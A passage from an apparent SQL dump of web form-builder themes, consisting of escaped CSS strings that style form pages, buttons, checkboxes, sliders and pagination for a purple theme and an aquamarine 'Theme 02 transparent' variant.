24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/02/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #5C00DA;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #3D0886;\r\n}.previous-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left #5C00DA;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/previous.png)  top left #3D0886;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #5C00DA;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #4D4A3C;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #E3E2E4;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #CFCFCF;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #5C00DA;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\nfont-weight: 600;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\nfloat:left;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #3F3927;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #DCDADB;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #D1CDCE;\r\n}\r\n.page_active {\r\n	color: #FFF;\r\n	cursor: pointer;\r\n	background-color: #5C00DA;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #5C00DA ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #5C00DA ), color-stop(49%, #5C00DB ), color-stop(84%, #6600F0 ), color-stop(99%, #7917FF )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* IE10+ */\r\n	background: linear-gradient(to right, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #D9D7D8;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #fff;\r\n	font-weight: bold;\r\nfont-size:13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}', 0),
(8, 'Theme 02 transparent (aquamarine button)', '.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #EAF9F3;\r\nborder: 1px solid #4D4A58;\r\nmargin-bottom: 10px;\r\ncolor: #4D4A58;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/02/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #94FFD5;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/next.png) top right  #E4F3E2;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left #94FFD5;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left  #E4F3E2;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #94FFD5;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #4D4A3C;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #CFCFCF;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #CFAB1A;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\nfont-weight: 600;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\nbackground: #E9E9E9;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #E9E9E9;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #E9E9E9;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #E9E9E9;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/02/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: 